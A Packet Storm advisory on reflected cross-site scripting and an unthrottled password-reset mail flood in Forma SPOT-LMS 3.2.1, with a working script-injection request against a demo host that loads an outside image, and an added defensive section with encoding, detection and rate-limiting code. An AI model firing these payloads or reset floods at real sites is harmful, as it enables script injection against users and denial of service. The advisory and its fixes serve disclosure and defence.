PACKETSTORM:169734

Forma SPOT-LMS 3.2.1 Cross Site Scripting

2022-11-08 00:00:00
nu11secur1ty
packetstormsecurity.com
## Title: Forma SPOT-LMS-3.2.1 Cross-site scripting (reflected) - password-reset mail flood  
## Author: nu11secur1ty  
## Date: 11.07.2022  
## Vendor: https://www.spotlms.us/index_multi.php  
## Tested on the vendor's demo instance:  
https://www.spotlms-anca-001.ovh/  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest  
  
## Description:  
The path segment appended to forgetpw.php (reported by the scanner as the  
name of an arbitrarily supplied `URL` parameter) is copied without encoding  
into the value of an HTML tag attribute that is enclosed in double quotation  
marks. The probe qnlxv"><script>alert('hello from  
nu11secur1ty')</script>sad4r was submitted as that path segment and was  
echoed unmodified in the application's response: the leading `"` closes the  
attribute, `>` closes the tag, and the script element that follows is parsed  
as markup and executed in the victim's browser.  
The same forgetpw.php endpoint imposes no limit on reset requests, so an  
attacker can replay it to send an unbounded number of password-reset mails  
to an already existing account on a target domain, for example  
www.spotlms-anca-001.ovh; the author reports this as enough to crash the  
cloud system.  
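The two problems the description raises can be modelled side by side. The block below is an added example, not code from the original advisory or from Forma SPOT-LMS: a constructed stand-in for the reset form that reflects the path segment after forgetpw.php into a double-quoted attribute, beside a version that entity-encodes it for the attribute context (in the PHP application the equivalent is htmlspecialchars with ENT_QUOTES); a check that tells a raw reflection from the percent-encoded echo that the response excerpt shows inside the mod_pagespeed beacon argument; and a per-account throttle of the kind that stops the reset-mail flood. The function names, the form markup, the sample response and the limits are assumptions.

```python
"""Added example, not code from the original advisory or from Forma SPOT-LMS.
Models the two problems the description raises with constructed pieces:
a stand-in reset form that reflects the path segment after forgetpw.php
into a double-quoted attribute, a check that separates a raw reflection
from an encoded echo, and a per-account throttle for reset mails."""
import html
import time
from collections import defaultdict, deque
from typing import Optional
from urllib.parse import quote

# Break-out probe in the shape the advisory uses: closes the attribute
# with ", closes the tag with >, then injects a script element.
PAYLOAD = 'qnlxv"><script>alert(1)</script>sad4r'

# Constructed markup (assumption, not the application's real template):
# the path segment ends up in the value attribute of a hidden field.
TEMPLATE = ('<form method="post" action="/forgetpw.php">'
            '<input type="hidden" name="ret" value="{}"></form>')


def render_vulnerable(path_info: str) -> str:
    """Reproduces the reported bug: the path segment is echoed verbatim."""
    return TEMPLATE.format(path_info)


def render_fixed(path_info: str) -> str:
    """Attribute-context encoding: &, <, >, " and ' become entities, so the
    value can no longer close the attribute or the tag. The PHP equivalent
    is htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')."""
    return TEMPLATE.format(html.escape(path_info, quote=True))


def classify_reflections(response: str, marker: str = PAYLOAD) -> dict:
    """Count each form in which the probe comes back. Only a raw copy is
    exploitable as HTML; a percent-encoded copy (as in the mod_pagespeed
    beacon argument in the advisory's response excerpt) sits inside a URL
    string, and an entity-encoded copy is the correctly escaped case."""
    return {
        "raw": response.count(marker),
        "percent_encoded": response.count(quote(marker)),
        "entity_encoded": response.count(html.escape(marker, quote=True)),
    }


def payload_breaks_out(response: str, marker: str = PAYLOAD) -> bool:
    """True when at least one verbatim copy of the probe is in the response."""
    return classify_reflections(response, marker)["raw"] > 0


# Constructed response in the shape of the advisory's excerpt: a beacon call
# that embeds the request URL percent-encoded, followed by the vulnerable form.
SAMPLE_RESPONSE = (
    "pagespeed.CriticalImages.Run('/mod_pagespeed_beacon',"
    f"'https://www.spotlms-anca-001.ovh/forgetpw.php/{quote(PAYLOAD)}',true);\n"
    + render_vulnerable(PAYLOAD)
)


class ResetThrottle:
    """At most `limit` reset mails per account within `window` seconds.
    Replaying the same request then stops producing mail, which removes the
    flooding the advisory describes. Constructed example, not the app's code."""

    def __init__(self, limit: int = 3, window: int = 3600) -> None:
        self.limit = limit
        self.window = window
        self._sent = defaultdict(deque)  # account -> send timestamps

    def allow(self, account: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        sent = self._sent[account.strip().lower()]
        while sent and now - sent[0] >= self.window:  # drop expired entries
            sent.popleft()
        if len(sent) >= self.limit:
            return False
        sent.append(now)
        return True


if __name__ == "__main__":
    print(classify_reflections(SAMPLE_RESPONSE))
    print(classify_reflections(render_fixed(PAYLOAD)))
```

When triaging a scanner finding like this one, run the classifier over the full response body rather than grepping for `<script>`: a hit that is only percent-encoded inside a URL string is not the injection point, and a body that contains the entity-encoded copy alone means the sink is already fixed.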
  
## NOTE:  
For this test, Google reacted on the twentieth request =) and blocked the  
requests from my exploit, but after some time the attacker can repeat  
these steps endlessly :)  
  
## STATUS: HIGH severity  
  
[+] Exploit:  
  
The payload travels in the path segment after forgetpw.php; the HTTP/2 request is shown as captured:  
  
```http
GET /forgetpw.php/qnlxv"><script>function a() { document.write("<img src='https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/XSS-image/image/kostaakatil.webp?token=GHSAT0AAAAAABTHSDC76YMVBQKZ7VLVFSBAYTHWGMQ'></img>"); }; window.onload = a; alert("A Hidden scripted image, warning you are vulnerable!");</script>sad4r HTTP/2
Host: www.spotlms-anca-001.ovh
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Cache-Control: max-age=0
Cookie: PHPSESSID=7affe3c03b941d681047eea2ed6a5809; _ga=GA1.2.688816030.1667823793; _gid=GA1.2.466977147.1667823793; _gat=1
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
```  
[+] Response (excerpt):  
  
```html
pagespeed.CriticalImages.Run('/mod_pagespeed_beacon','https://www.spotlms-anca-001.ovh/forgetpw.php/qnlxv%22%3E%3Cscript%3Efunction','lJlesnYP1D',true,false,'eZpCFSK_6xQ');  
//]]></script><img class="img-fluid mx-auto d-block" alt="LOGO"  
src="/images/logos/logo-aurorae-v0.png" width="176" height="65"  
data-pagespeed-url-hash="3925108827"  
onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/>  
<center>  
<p class="mt-3">A validation code will be sent to  
your email to authorize the password reset operation</p>  
</center>  
```  
  
In this excerpt the probe reappears only percent-encoded, inside the URL argument of the mod_pagespeed beacon call, where it is inert; the exploitable reflection is the double-quoted attribute described above, which this excerpt does not reproduce.  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest)  
  
## Proof and Exploit:  
[href](https://streamable.com/y4gz1n)  
  
## Time spent  
`1:45`